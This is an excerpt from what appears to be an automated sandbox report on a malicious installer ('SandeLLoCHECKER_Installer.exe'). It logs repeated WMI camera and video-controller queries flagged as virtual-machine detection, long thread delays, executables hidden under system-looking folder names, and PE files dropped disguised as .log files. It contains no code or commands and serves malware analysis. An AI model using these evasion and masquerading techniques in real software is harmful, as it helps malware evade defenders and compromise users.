                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeMemory allocated: D80000 memory reserve | memory write watchJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeMemory allocated: 1AB40000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 12F0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1AF80000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1340000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1B060000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1890000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1B340000 memory reserve | memory write watch
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 599874
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598859
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598718
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598499
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598375
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 597421
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 597250
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 597103
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596999
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596859
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596733
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596623
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 300000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596515
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596406
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596296
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596187
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596078
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595968
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595859
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595749
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595640
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595530
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595421
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595289
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594630
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594499
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594385
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594281
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594168
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594062
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593949
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593843
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593734
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593624
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593487
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593359
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593249
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593140
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593031
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592921
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592812
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592702
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592540
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592427
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592046
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591878
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591732
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591624
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591515
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWindow / User API: threadDelayed 4080
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWindow / User API: threadDelayed 5652
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\OfhhMrNQ.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\UvPgJftz.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI47C9.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\lNILRSep.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI46ED.tmpJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI44B9.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\UplOiJFY.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\yYksYVbT.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi436E.tmpJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4DB5.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\MAAYLQkP.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\wKKCkQsU.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\OWmHElNj.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\BXyiPEuJ.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\lzmaextractor.dllJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\lealJKxT.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\XaQepXPR.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\gaqNoVOB.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\jUtdfVsr.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4DD5.tmpJump to dropped file
